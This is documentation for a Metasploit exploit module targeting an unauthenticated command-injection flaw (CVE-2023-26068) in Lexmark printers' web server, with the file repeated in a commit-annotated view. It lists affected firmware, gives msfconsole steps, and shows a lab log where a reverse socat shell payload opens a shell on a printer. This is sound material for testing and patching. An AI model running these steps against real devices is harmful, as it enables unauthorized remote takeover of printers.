documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md

## Vulnerable Application
A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.
The vulnerability is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked
if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings`
is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.

A number of the configurable parameters on the page (ex. `FT_Custom_lbtrace`) fail to be sanitized properly before being
used in an bash eval statement: `eval "$cmd" > /dev/null`, allowing for an unauthenticated user to run arbitrary commands.

### Installation Steps

Testing of this module was performed on a physical device. Emulating firmware through qemu or similar methods have not
been explored.

### Affected Models

| Lexmark Models | Affected Releases | Fixed Releases          |
| ---------------|-------------------|-------------------------|
| CX930, CX931, CX942, <br/>CX943, CX944 | CXTPC.081.232 and previous | CXTPC.081.233 and later |
| XC9325, XC9335, XC9445, <br/>XC9455, XC9465 | CXTPC.081.232 and previous | CXTPC.081.233 and later |
| CS943 | CSTPC.081.232 and previous | CSTPC.081.233 and later |
| MX432 | MXTCT.081.232 and previous | MXTCT.081.233 and later |
| XM3142 | MXTCT.081.232 and previous | MXTCT.081.233 and later |
| MX931 | MXTPM.081.232 and previous | MXTPM.081.233 and later |
| CX730, CX735 | CXTMM.081.232 and previous | CXTMM.081.233 and later |
| XC4342, XC4352 | CXTMM.081.232 and previous | CXTMM.081.233 and later |
| CS730, CS735 | CSTMM.081.232 and previous | CSTMM.081.233 and later |
| C4342, C4352 | CSTMM.081.232 and previous | CSTMM.081.233 and later |
| B2236 | MSLSG.081.232 and previous | MSLSG.081.233 and later |
| MB2236 | MXLSG.081.232 and previous | MXLSG.081.233 and later |
| MS331, MS431, MS439 | MSLBD.081.232 and previous | MSLBD.081.233 and later |
| M1342 | MSLBD.081.232 and previous | MSLBD.081.233 and later |
| B3442, B3340 | MSLBD.081.232 and previous | MSLBD.081.233 and later |
| XM1342 | MXLBD.081.232 and previous | MXLBD.081.233 and later |
| MX331, MX431 | MXLBD.081.232 and previous | MXLBD.081.233 and later |
| MB3442 | MXLBD.081.232 and previous | MXLBD.081.233 and later |
| MS321, MS421, MS521, MS621 | MSNGM.081.232 and previous | MSNGM.081.233 and later |
| M1242, M1246 | MSNGM.081.232 and previous | MSNGM.081.233 and later |
| B2338, B2442, B2546, B2650 | MSNGM.081.232 and previous | MSNGM.081.233 and later |
| MS622 | MSTGM.081.232 and previous | MSTGM.081.233 and later |
| M3250 | MSTGM.081.232 and previous | MSTGM.081.233 and later |
| MX321 | MXNGM.081.232 and previous | MXNGM.081.233 and later |
| MB2338 | MXNGM.081.232 and previous | MXNGM.081.233 and later |
| MX421, MX521, MX522, MX622 | MXTGM.081.232 and previous | MXTGM.081.233 and later |
| XM1242, XM1246, XM3250 | MXTGM.081.232 and previous | MXTGM.081.233 and later |
| MB2442. MB2546, MB2650 | MXTGM.081.232 and previous | MXTGM.081.233 and later |
| MS725, MS821, MS823, MS825 | MSNGW.081.232 and previous | MSNGW.081.233 and later |
| B2865 | MSNGW.081.232 and previous | MSNGW.081.233 and later |
| MS822, MS826 | MSTGW.081.232 and previous | MSTGW.081.233 and later |
| M5255, M5270 | MSTGW.081.232 and previous | MSTGW.081.233 and later |
| MX721, MX722, MX725, <br/>MX822, MX826 | MXTGW.081.232 and previous | MXTGW.081.233 and later |
| XM5365, XM5370, XM7355, XM7370 | MXTGW.081.232 and previous | MXTGW.081.233 and later |
| MB2770 | MXTGW.081.232 and previous | MXTGW.081.233 and later |
| C3426 | CSLBN.081.232 and previous | CSLBN.081.233 and later |
| CS431, CS439 | CSLBN.081.232 and previous | CSLBN.081.233 and later |
| CS331 | CSLBL.081.232 and previous | CSLBL.081.233 and later |
| C3224, C3326 | CSLBL.081.232 and previous | CSLBL.081.233 and later |
| C2326 | CSLBN.081.232 and previous | CSLBN.081.233 and later |
| MC3426 | CXLBN.081.232 and previous | CXLBN.081.233 and later |
| CX431 | CXLBN.081.232 and previous | CXLBN.081.233 and later |
| XC2326 | CXLBN.081.232 and previous | CXLBN.081.233 and later |
| MC3426 | CXLBN.081.232 and previous | CXLBN.081.233 and later |
| MC3224, MC3326 | CXLBL.081.232 and previous | CXLBL.081.233 and later |
| CX331 | CXLBL.081.232 and previous | CXLBL.081.233 and later |
| CS622 | CSTZJ.081.232 and previous | CSTZJ.081.233 and later |
| C2240 | CSTZJ.081.232 and previous | CSTZJ.081.233 and later |
| CS421, CS521 | CSNZJ.081.232 and previous | CSNZJ.081.233 and later |
| C2325, C2425, C2535 | CSNZJ.081.232 and previous | CSNZJ.081.233 and later |
| CX522, CX622, CX625 | CXTZJ.081.232 and previous | CXTZJ.081.233 and later |
| XC2235, XC4240 | CXTZJ.081.232 and previous | CXTZJ.081.233 and later |
| MC2535, MC2640 | CXTZJ.081.232 and previous | CXTZJ.081.233 and later |
| CX421 | CXNZJ.081.232 and previous | CXNZJ.081.233 and later |
| MC2325, MC2425 | CXNZJ.081.232 and previous | CXNZJ.081.233 and later |
| CX820, CX825, CX827, CX860 | CXTPP.081.232 and previous | CXTPP.081.233 and later |
| XC6152, XC6153, XC8155, <br/>XC8160, XC8163 | CXTPP.081.232 and previous | CXTPP.081.233 and later |
| CS820, CS827 | CSTPP.081.232 and previous | CSTPP.081.233 and later |
| C6160 | CSTPP.081.232 and previous | CSTPP.081.233 and later |
| CS720, CS725, CS727, CS728 | CSTAT.081.232 and previous | CSTAT.081.233 and later |
| C4150 | CSTAT.081.232 and previous | CSTAT.081.233 and later |
| CX725, CX727 | CXTAT.081.232 and previous | CXTAT.081.233 and later |
| XC4140, XC4143, XC4150, XC4153 | CXTAT.081.232 and previous | CXTAT.081.233 and later |
| CS921, CS923, CS927 | CSTMH.081.232 and previous | CSTMH.081.233 and later |
| C9235 | CSTMH.081.232 and previous | CSTMH.081.233 and later |
| CX920, CX921, CX922, <br/>CX923, CX924 | CXTMH.081.232 and previous | CXTMH.081.233 and later |
| XC9225, XC9235, XC9245, <br/>XC9255, XC9265 | CXTMH.081.232 and previous | CXTMH.081.233 and later |

## Verification Steps
1. Start `msfconsole`
1. Do: `use exploit/linux/http/lexmark_faxtrace_settings`
1. Do: `set RHOST [IP]`
1. Do: `set LHOST [IP]`
1. Do: `exploit`

## Options

### SLEEP

If the printer has been inactive for some time it might be sleeping, in which case it's best to send a request
or two to wake it up before running the check method or exploit. This parameter indicates how to to wait for the printer
to wake up.

## Scenarios

### Lexmark Printer MC3224 CXLBL.073.023
```
msf6 > use linux/http/lexmark_faxtrace_settings
[*] Using configured payload cmd/unix/reverse_socat_tcp
msf6 exploit(linux/http/lexmark_faxtrace_settings) > set rhosts 192.168.1.71
rhosts => 192.168.1.71
msf6 exploit(linux/http/lexmark_faxtrace_settings) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf6 exploit(linux/http/lexmark_faxtrace_settings) > options

Module options (exploit/linux/http/lexmark_faxtrace_settings):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.71     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SLEEP    10               yes       Sleep time to wait for the print to wake
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_socat_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.72     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


View the full module info with the info, or info -d command.

msf6 exploit(linux/http/lexmark_faxtrace_settings) > run

[*] Started reverse TCP handler on 192.168.1.72:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Waking up the printer ...
[+] The target appears to be vulnerable. The vulnerable endpoint "/cgi-bin/fax_change_faxtrace_settings" is reachable
[*] Executing Unix (In-Memory) for cmd/unix/reverse_socat_tcp
[*] Command shell session 5 opened (192.168.1.72:4444 -> 192.168.1.71:54456) at 2023-08-30 19:51:57 -0400


Shell Banner:
httpd@ET788C773C36F9:/usr/share/web/cgi-bin$
-----


httpd@ET788C773C36F9:/usr/share/web/cgi-bin$ id
id
uid=985(httpd) gid=982(httpd) groups=982(httpd)
httpd@ET788C773C36F9:/usr/share/web/cgi-bin$ uname -a
uname -a
Linux ET788C773C36F9 4.17.19-yocto-standard-74b7175b2a3452f756ffa76f750e50db #1 SMP PREEMPT Mon Jun 29 19:46:01 UTC 2020 armv7l GNU/Linux
httpd@ET788C773C36F9:/usr/share/web/cgi-bin$
```
Lexmark Device Embedded Web Server RCE (CVE-2023-26068) 2023-08-30 20:30:14 -04:00			`## Vulnerable Application`
			`A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.`
			`The vulnerability is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked`
			if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings`
			`is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.`

			A number of the configurable parameters on the page (ex. `FT_Custom_lbtrace`) fail to be sanitized properly before being
			used in an bash eval statement: `eval "$cmd" > /dev/null`, allowing for an unauthenticated user to run arbitrary commands.

			`### Installation Steps`

spelling fixes on docs 2023-10-10 14:46:18 -04:00			`Testing of this module was performed on a physical device. Emulating firmware through qemu or similar methods have not`
Lexmark Device Embedded Web Server RCE (CVE-2023-26068) 2023-08-30 20:30:14 -04:00			`been explored.`

			`### Affected Models`

			`\| Lexmark Models \| Affected Releases \| Fixed Releases \|`
			`\| ---------------\|-------------------\|-------------------------\|`
			`\| CX930, CX931, CX942, <br/>CX943, CX944 \| CXTPC.081.232 and previous \| CXTPC.081.233 and later \|`
			`\| XC9325, XC9335, XC9445, <br/>XC9455, XC9465 \| CXTPC.081.232 and previous \| CXTPC.081.233 and later \|`
			`\| CS943 \| CSTPC.081.232 and previous \| CSTPC.081.233 and later \|`
			`\| MX432 \| MXTCT.081.232 and previous \| MXTCT.081.233 and later \|`
			`\| XM3142 \| MXTCT.081.232 and previous \| MXTCT.081.233 and later \|`
			`\| MX931 \| MXTPM.081.232 and previous \| MXTPM.081.233 and later \|`
			`\| CX730, CX735 \| CXTMM.081.232 and previous \| CXTMM.081.233 and later \|`
			`\| XC4342, XC4352 \| CXTMM.081.232 and previous \| CXTMM.081.233 and later \|`
			`\| CS730, CS735 \| CSTMM.081.232 and previous \| CSTMM.081.233 and later \|`
			`\| C4342, C4352 \| CSTMM.081.232 and previous \| CSTMM.081.233 and later \|`
			`\| B2236 \| MSLSG.081.232 and previous \| MSLSG.081.233 and later \|`
			`\| MB2236 \| MXLSG.081.232 and previous \| MXLSG.081.233 and later \|`
			`\| MS331, MS431, MS439 \| MSLBD.081.232 and previous \| MSLBD.081.233 and later \|`
			`\| M1342 \| MSLBD.081.232 and previous \| MSLBD.081.233 and later \|`
			`\| B3442, B3340 \| MSLBD.081.232 and previous \| MSLBD.081.233 and later \|`
			`\| XM1342 \| MXLBD.081.232 and previous \| MXLBD.081.233 and later \|`
			`\| MX331, MX431 \| MXLBD.081.232 and previous \| MXLBD.081.233 and later \|`
			`\| MB3442 \| MXLBD.081.232 and previous \| MXLBD.081.233 and later \|`
			`\| MS321, MS421, MS521, MS621 \| MSNGM.081.232 and previous \| MSNGM.081.233 and later \|`
			`\| M1242, M1246 \| MSNGM.081.232 and previous \| MSNGM.081.233 and later \|`
			`\| B2338, B2442, B2546, B2650 \| MSNGM.081.232 and previous \| MSNGM.081.233 and later \|`
			`\| MS622 \| MSTGM.081.232 and previous \| MSTGM.081.233 and later \|`
			`\| M3250 \| MSTGM.081.232 and previous \| MSTGM.081.233 and later \|`
			`\| MX321 \| MXNGM.081.232 and previous \| MXNGM.081.233 and later \|`
			`\| MB2338 \| MXNGM.081.232 and previous \| MXNGM.081.233 and later \|`
			`\| MX421, MX521, MX522, MX622 \| MXTGM.081.232 and previous \| MXTGM.081.233 and later \|`
			`\| XM1242, XM1246, XM3250 \| MXTGM.081.232 and previous \| MXTGM.081.233 and later \|`
			`\| MB2442. MB2546, MB2650 \| MXTGM.081.232 and previous \| MXTGM.081.233 and later \|`
			`\| MS725, MS821, MS823, MS825 \| MSNGW.081.232 and previous \| MSNGW.081.233 and later \|`
			`\| B2865 \| MSNGW.081.232 and previous \| MSNGW.081.233 and later \|`
			`\| MS822, MS826 \| MSTGW.081.232 and previous \| MSTGW.081.233 and later \|`
			`\| M5255, M5270 \| MSTGW.081.232 and previous \| MSTGW.081.233 and later \|`
			`\| MX721, MX722, MX725, <br/>MX822, MX826 \| MXTGW.081.232 and previous \| MXTGW.081.233 and later \|`
			`\| XM5365, XM5370, XM7355, XM7370 \| MXTGW.081.232 and previous \| MXTGW.081.233 and later \|`
			`\| MB2770 \| MXTGW.081.232 and previous \| MXTGW.081.233 and later \|`
			`\| C3426 \| CSLBN.081.232 and previous \| CSLBN.081.233 and later \|`
			`\| CS431, CS439 \| CSLBN.081.232 and previous \| CSLBN.081.233 and later \|`
			`\| CS331 \| CSLBL.081.232 and previous \| CSLBL.081.233 and later \|`
			`\| C3224, C3326 \| CSLBL.081.232 and previous \| CSLBL.081.233 and later \|`
			`\| C2326 \| CSLBN.081.232 and previous \| CSLBN.081.233 and later \|`
			`\| MC3426 \| CXLBN.081.232 and previous \| CXLBN.081.233 and later \|`
			`\| CX431 \| CXLBN.081.232 and previous \| CXLBN.081.233 and later \|`
			`\| XC2326 \| CXLBN.081.232 and previous \| CXLBN.081.233 and later \|`
			`\| MC3426 \| CXLBN.081.232 and previous \| CXLBN.081.233 and later \|`
			`\| MC3224, MC3326 \| CXLBL.081.232 and previous \| CXLBL.081.233 and later \|`
			`\| CX331 \| CXLBL.081.232 and previous \| CXLBL.081.233 and later \|`
			`\| CS622 \| CSTZJ.081.232 and previous \| CSTZJ.081.233 and later \|`
			`\| C2240 \| CSTZJ.081.232 and previous \| CSTZJ.081.233 and later \|`
			`\| CS421, CS521 \| CSNZJ.081.232 and previous \| CSNZJ.081.233 and later \|`
			`\| C2325, C2425, C2535 \| CSNZJ.081.232 and previous \| CSNZJ.081.233 and later \|`
			`\| CX522, CX622, CX625 \| CXTZJ.081.232 and previous \| CXTZJ.081.233 and later \|`
			`\| XC2235, XC4240 \| CXTZJ.081.232 and previous \| CXTZJ.081.233 and later \|`
			`\| MC2535, MC2640 \| CXTZJ.081.232 and previous \| CXTZJ.081.233 and later \|`
			`\| CX421 \| CXNZJ.081.232 and previous \| CXNZJ.081.233 and later \|`
			`\| MC2325, MC2425 \| CXNZJ.081.232 and previous \| CXNZJ.081.233 and later \|`
			`\| CX820, CX825, CX827, CX860 \| CXTPP.081.232 and previous \| CXTPP.081.233 and later \|`
			`\| XC6152, XC6153, XC8155, <br/>XC8160, XC8163 \| CXTPP.081.232 and previous \| CXTPP.081.233 and later \|`
			`\| CS820, CS827 \| CSTPP.081.232 and previous \| CSTPP.081.233 and later \|`
			`\| C6160 \| CSTPP.081.232 and previous \| CSTPP.081.233 and later \|`
			`\| CS720, CS725, CS727, CS728 \| CSTAT.081.232 and previous \| CSTAT.081.233 and later \|`
			`\| C4150 \| CSTAT.081.232 and previous \| CSTAT.081.233 and later \|`
			`\| CX725, CX727 \| CXTAT.081.232 and previous \| CXTAT.081.233 and later \|`
			`\| XC4140, XC4143, XC4150, XC4153 \| CXTAT.081.232 and previous \| CXTAT.081.233 and later \|`
			`\| CS921, CS923, CS927 \| CSTMH.081.232 and previous \| CSTMH.081.233 and later \|`
			`\| C9235 \| CSTMH.081.232 and previous \| CSTMH.081.233 and later \|`
			`\| CX920, CX921, CX922, <br/>CX923, CX924 \| CXTMH.081.232 and previous \| CXTMH.081.233 and later \|`
			`\| XC9225, XC9235, XC9245, <br/>XC9255, XC9265 \| CXTMH.081.232 and previous \| CXTMH.081.233 and later \|`

			`## Verification Steps`
			1. Start `msfconsole`
Tidy up, last minute rubocop 2023-08-31 02:17:35 -04:00			1. Do: `use exploit/linux/http/lexmark_faxtrace_settings`
Lexmark Device Embedded Web Server RCE (CVE-2023-26068) 2023-08-30 20:30:14 -04:00			1. Do: `set RHOST [IP]`
			1. Do: `set LHOST [IP]`
			1. Do: `exploit`

			`## Options`

			`### SLEEP`

			`If the printer has been inactive for some time it might be sleeping, in which case it's best to send a request`
			`or two to wake it up before running the check method or exploit. This parameter indicates how to to wait for the printer`
			`to wake up.`

			`## Scenarios`

			`### Lexmark Printer MC3224 CXLBL.073.023`
			```
			`msf6 > use linux/http/lexmark_faxtrace_settings`
Tidy up, last minute rubocop 2023-08-31 02:17:35 -04:00			`[*] Using configured payload cmd/unix/reverse_socat_tcp`
Lexmark Device Embedded Web Server RCE (CVE-2023-26068) 2023-08-30 20:30:14 -04:00			`msf6 exploit(linux/http/lexmark_faxtrace_settings) > set rhosts 192.168.1.71`
			`rhosts => 192.168.1.71`
			`msf6 exploit(linux/http/lexmark_faxtrace_settings) > set lhost 192.168.1.72`
			`lhost => 192.168.1.72`
			`msf6 exploit(linux/http/lexmark_faxtrace_settings) > options`

			`Module options (exploit/linux/http/lexmark_faxtrace_settings):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`Proxies no A proxy chain of format type:host:port[,type:host:port][...]`
			`RHOSTS 192.168.1.71 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html`
			`RPORT 80 yes The target port (TCP)`
			`SLEEP 10 yes Sleep time to wait for the print to wake`
			`SSL false no Negotiate SSL/TLS for outgoing connections`
			`VHOST no HTTP server virtual host`


			`Payload options (cmd/unix/reverse_socat_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST 192.168.1.72 yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Unix (In-Memory)`



			`View the full module info with the info, or info -d command.`

			`msf6 exploit(linux/http/lexmark_faxtrace_settings) > run`

			`[*] Started reverse TCP handler on 192.168.1.72:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[*] Waking up the printer ...`
Tidy up, last minute rubocop 2023-08-31 02:17:35 -04:00			`[+] The target appears to be vulnerable. The vulnerable endpoint "/cgi-bin/fax_change_faxtrace_settings" is reachable`
Lexmark Device Embedded Web Server RCE (CVE-2023-26068) 2023-08-30 20:30:14 -04:00			`[*] Executing Unix (In-Memory) for cmd/unix/reverse_socat_tcp`
			`[*] Command shell session 5 opened (192.168.1.72:4444 -> 192.168.1.71:54456) at 2023-08-30 19:51:57 -0400`


			`Shell Banner:`
			`httpd@ET788C773C36F9:/usr/share/web/cgi-bin$`
			`-----`


			`httpd@ET788C773C36F9:/usr/share/web/cgi-bin$ id`
			`id`
			`uid=985(httpd) gid=982(httpd) groups=982(httpd)`
			`httpd@ET788C773C36F9:/usr/share/web/cgi-bin$ uname -a`
			`uname -a`
			`Linux ET788C773C36F9 4.17.19-yocto-standard-74b7175b2a3452f756ffa76f750e50db #1 SMP PREEMPT Mon Jun 29 19:46:01 UTC 2020 armv7l GNU/Linux`
			`httpd@ET788C773C36F9:/usr/share/web/cgi-bin$`
			```